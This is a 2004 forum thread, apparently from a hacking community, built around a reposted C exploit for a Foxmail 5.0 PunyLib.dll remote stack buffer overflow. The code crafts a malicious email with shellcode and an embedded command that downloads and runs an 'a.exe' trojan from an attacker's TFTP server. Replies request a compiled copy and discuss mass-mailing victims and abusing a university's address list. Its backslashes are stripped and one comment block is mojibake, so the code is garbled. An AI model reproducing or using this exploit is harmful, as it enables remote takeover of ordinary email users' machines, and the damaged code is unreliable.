Foxmail 5.0 Punylib.dll Remote Stack Buffer Overfl

cyrixx

Mar 22 2004, 04:23 PM

hey ho, i've found this... hope it's not a repost

CODE

/* ex_foxmail5.0_windows.c - x86/win32 Foxmail 5.0 PunyLib.dll remote stack buffer overflow exploit
*
* (C) COPYRIGHT XFOCUS Security Team, 2004
* All Rights Reserved
*
* -----------------------------------------------------------------------
* Author : xfocus <webmaster@xfocus.org>
* : http://www.xfocus.org
* Maintain : XFOCUS Security Team <security@xfocus.org>
* Version : 0.2
*
* Test : Windows 2000 server GB/XP professional
* + Foxmail 5.0.300.0
* Notes : published vul.
* Greets : all member of XFOCUS Security Team.
* Complie : cl fmx.c
* Usage : fmx <mail_addr> <tftp_server> <smtp_server>
* mail_addr: email address we wantto hack
* tftp_server: run a tftp server and have a a.exe trojan
* smtp_server: SMTP server don't need login, we send the email thru it
*
* Date : 2004-02-27
* Revised : 2004-03-05
*
* Revise History:
* 2003-03-05 call WinExec() addr of Foxmail.exe module to run tftp for down&execute
*/
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

#pragma comment (lib,"ws2_32")

//mail body, it's based on a real spam email, heh
unsigned char packet[] =
"From: %srn" //buffer to overrun
"Subject: Hi,manrn"
"MIME-Version: 1.0rn"
"Content-Type: multipart/mixed; boundary="87122827"rn"
"rn"
"rn"
"--87122827rn"
"Content-Type: text/plain; charset=us-asciirn"
"Content-Transfer-Encoding: 7bitrn"
"rn"
"Trn"
"rn"
"--87122827rn"
"Content-Disposition: attachmentrn"
"Content-Type: Text/HTML;rn"
" name="girl.htm"rn"
"Content-Transfer-Encoding: 7bitrn"
"rn"
"<html></html>rn"
"--87122827--rn"
"rn"
".rn";

//tiny shellcode to run WinExec() address in Foxmail.exe module(foxmail 5.0.300)
unsigned char winexec[] =
"x83xecx50xebx0cxb9x41x10xd3x5dxc1xe9x08xffx11xebx08x33xdbx53xe8xecxffxffxff";

//tiny shellcode to run WinExec() address in Foxmail.exe module(foxmail 5.0.210 BETA2)
unsigned char winexec2[] =
"x83xecx50xebx0cxb9x41x10xa3x5dxc1xe9x08xffx11xebx08x33xdbx53xe8xecxffxffxff";

#define SMTPPORT 25
int Make_Connection(char *address,int port,int timeout);
int SendXMail(char *mailaddr, char *tftp, char *smtpserver, char *shellcode);

int main(int argc, char * argv[])
{
WSADATA WSAData;
char *mailaddr = NULL;
char *tftp = NULL;
char *smtpserver = NULL;

if(argc!=4)
{
printf("Usage: %s <mail_addr> <tftp_server> <smtp_server>ne.g.:%s eeye@hack.com 202.2.3.4 219.3.2.1n", argv[0], argv[0]);
return 1;
}
mailaddr=argv[1];
tftp=argv[2];
smtpserver=argv[3];

if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0)
{
printf("WSAStartup failed.n");
WSACleanup();
exit(1);
}

//WinExec() address
SendXMail(mailaddr, tftp, smtpserver, winexec); //WinExec() address in Foxmail.exe module(foxmail 5.0.300)
SendXMail(mailaddr, tftp, smtpserver, winexec2); //WinExec() address in Foxmail.exe module(foxmail 5.0.210 BETA2)

WSACleanup();

return 0;
}

// ½¨Á¢TCPÁ¬½Ó
// ÊäÈë:
// char * address IPµØÖ·
// int port ¶Ë¿Ú
// int timeout ÑÓÊ±
// Êä³ö:
// ·µ»Ø:
// ³É¹¦ >0
// ´íÎó <=0

int Make_Connection(char *address,int port,int timeout)
{
struct sockaddr_in target;
SOCKET s;
int i;
DWORD bf;
fd_set wd;
struct timeval tv;

s = socket(AF_INET,SOCK_STREAM,0);
if(s<0)
return -1;

target.sin_family = AF_INET;
target.sin_addr.s_addr = inet_addr(address);
if(target.sin_addr.s_addr==0)
{
closesocket(s);
return -2;
}
target.sin_port = htons(port);
bf = 1;
ioctlsocket(s,FIONBIO,&bf);
tv.tv_sec = timeout;
tv.tv_usec = 0;
FD_ZERO(&wd);
FD_SET(s,&wd);
connect(s,(struct sockaddr *)&target,sizeof(target));
if((i=select(s+1,0,&wd,0,&tv))==(-1))
{
closesocket(s);
return -3;
}
if(i==0)
{
closesocket(s);
return -4;
}
i = sizeof(int);
getsockopt(s,SOL_SOCKET,SO_ERROR,(char *)&bf,&i);
if((bf!=0)||(i!=sizeof(int)))
{
closesocket(s);
return -5;
}
ioctlsocket(s,FIONBIO,&bf);
return s;
}

//send magic mail
int SendXMail( char *mailaddr, char *tftp, char *smtpserver, char *shellcode)
{
SOCKET csock;
int ret,i=0;
char buf[510], sbuf[0x10000], tmp[500], tmp1[500];
csock = Make_Connection(smtpserver, SMTPPORT, 10);
if(csock<0)
{
printf("connect err.n");
exit(1);
}

memset(buf, 0, sizeof(buf));
ret=recv(csock, buf, 4096, 0);
if(ret<=0)
{
printf("recv err.n");
exit(1);
}
printf(buf);

ret=send(csock, "HELO serverrn",strlen("HELO serverrn"), 0);
if(ret<=0)
{
printf("send err.n");
exit(1);
}
memset(buf, 0, sizeof(buf));
ret=recv(csock, buf, 4096, 0);
if(ret<=0)
{
printf("recv err.n");
exit(1);
}
printf(buf);

ret=send(csock, "MAIL FROM: info@sina.comrn",strlen("MAIL FROM: info@sina.comrn"), 0);
if(ret<=0)
{
printf("send err.n");
exit(1);
}
memset(buf, 0, sizeof(buf));
ret=recv(csock, buf, 4096, 0);
if(ret<=0)
{
printf("recv err.n");
exit(1);
}
printf(buf);

sprintf(tmp, "RCPT TO: %srn", mailaddr);
ret=send(csock, tmp,strlen(tmp), 0);
if(ret<=0)
{
printf("send err.n");
exit(1);
}
memset(buf, 0, sizeof(buf));
ret=recv(csock, buf, 4096, 0);
if(ret<=0)
{
printf("recv err.n");
exit(1);
}
printf(buf);
Sleep(1000);

ret=send(csock, "DATArn",strlen("DATArn"), 0);
if(ret<=0)
{
printf("send err.n");
exit(1);
}
memset(buf, 0, sizeof(buf));
ret=recv(csock, buf, 4096, 0);
if(ret<=0)
{
printf("recv err.n");
exit(1);
}
printf(buf);

printf("send exploit mail...n");
memset(sbuf, 0, sizeof(sbuf));
memset(buf, 0, sizeof(buf));
memset(buf, 0x41, sizeof(buf)-1);
memset(tmp, 0, sizeof(tmp));
//strcpy(tmp, winexec);//WinExec() address in Foxmail.exe module(foxmail 5.0.300)
strcpy(tmp, shellcode);//WinExec() address in Foxmail.exe module
strcat(tmp, "cmd /c tftp -i %s get a.exe&a.exe:");
sprintf(tmp1, tmp, tftp);
memcpy(buf+0x100-strlen(tmp1), tmp1, strlen(tmp1));
*(int *)(buf+0x100)=0x7ffa54cd; //ret addr jmp esp
*(int *)(buf+0x104)=0x80eb80eb; //jmp back
*(int *)(buf+0x108)=0x7ffdf220; //writeable addr
*(int *)(buf+0x110)=0x7ffdf220; //writeable addr
memcpy(buf, "girlx0d", 5);
sprintf(sbuf, (char *)packet, buf);

ret=send(csock, sbuf,strlen(sbuf), 0);
if(ret<=0)
{
printf("send err.n");
exit(1);
}
memset(buf, 0, sizeof(buf));
ret=recv(csock, buf, 4096, 0);
if(ret<=0)
{
printf("recv err.n");
exit(1);
}
printf(buf);
printf("exploit mail sent.n");
closesocket(csock);
return 0;
}

night^man

Mar 22 2004, 04:24 PM

some will compile it plz ?

Trackmaster

Mar 22 2004, 04:33 PM

QUOTE

Foxmail is one of the most popular Internet email client, especially in China, more than 3 million people are using Foxmail to handle their email everyday, and the English version is also widely used in more than 20 countries.

alot of scare stories about foxmail so i dont know how many hosts will use this

Heater

Mar 22 2004, 04:47 PM

Compiled

usch

Mar 22 2004, 04:57 PM

nice work m8 , but is there a way to massive exploit this?for example like imail ?
u would need to perform a banner scan on port 25 and then read the email adresses out.is that possible???

so long

brOmstar

Mar 22 2004, 06:30 PM

The vulnerability is on the client side so why u wanna check port 25 and do a bannerscan??

If I'm not wrong the Exploit sends a special crafted mail over a specified SMTP-Server to the client allowing u to specify a tftp-server from which then the file a.exe is downloaded and executed.

Is that right?

ilnctm

Mar 22 2004, 07:02 PM

wow thanx this is pretty good thanx for the find

morbido

Mar 22 2004, 07:05 PM

does this exploit works ????
post your report
thankz

Sp00ky

Mar 22 2004, 09:21 PM

this is nice thnx alot... btw i'm still a trial member so i can't post a new treat for this:

i heard from someone there is an updated dameware source code just now....
i searched the net but can't find it anyone had any luck???

brOmstar

Mar 22 2004, 09:35 PM

u mean this here?

http://www.governmentsecurity.org/forum/in...?showtopic=7408

_ET_

Mar 22 2004, 11:46 PM

Hmm looks nice... I didn't get much from imail.. gonna test it tomorrow... not now.. to tired after 3.5 hours gamin'

\

Report will follow.

DaClueless

Mar 23 2004, 12:37 AM

That is a small shellcode:

& quot;x83xecx50xebx0cxb9x41x10xd3x5dxc1xe9x08xffx11xebx08x33xdbx53xe8xecxffxffxff
"

Sp00ky

Mar 23 2004, 12:23 PM

anyone tried it yet? cause i didn't and it looks realy nice to use

brOmstar

Mar 23 2004, 03:30 PM

how u want to use that?

i don't understand how u know which victim use foxmail cause it's clientside ITS NOT A SERVER ..u can't check any banner or i'm wrong ??

willywutz

Mar 23 2004, 03:44 PM

Only way i know is check your incoming mail for the used client or do massmailing
and after check which ip´s downloaded your exe from the tftp server.

larsbruggie

Mar 23 2004, 07:49 PM

yeah that mass mail seems to be the only way, but where the hell do u get emails from, and how do u mass mail them

Niekos

Mar 23 2004, 08:07 PM

It's just something what just popped in my head:

1. Mass email with that option that he can send a notify, its an option in outlook. (sorry for my (filtered) up english).

2. Check the notify. And look for the fox email thing.

3. Mass mail the fox users with you favourite email program. Or write your own script.

_ET_

Mar 23 2004, 09:47 PM

Hmmz.. pretty worthless imo.

Mass mailing is not withing my gasps... I could mail all the students on my uni (got axx to the mail database.. but then I'm shure to get caught ... or they will ask me what is going on (so I would have to bust myself hehe)

Still waiting on that one cool Windows exploit

willywutz

Mar 24 2004, 12:51 PM

If you have the email adresses of your university u could use anon mailer
or an wrong configured mail host....

_ET_

Mar 24 2004, 02:03 PM

Yeah I can... but I won't .... it's many friends and it's my education ... not gonna play with them.

They know I have the list .. and they know I can do stuff..... so gues who will be on the suspects list

willywutz

Mar 24 2004, 03:50 PM

I´m sorry understood it wrong before.....

Sp00ky

Mar 24 2004, 03:56 PM

maby a stupid idea but just a thought. isnt there a program that let's you see with mail service the computer is using u are scanning... just like scanline does with the OS of a scanned ip???

usch

Mar 24 2004, 04:06 PM

retrieving the server is easy by doing a banner scan.but the main problem is to know an email account

so long

brOmstar

Mar 24 2004, 07:37 PM

usch once again ->ONLY FOR YOU this exploit is for a mail CLIENT ..why do u want to scan for a SERVER-banner ?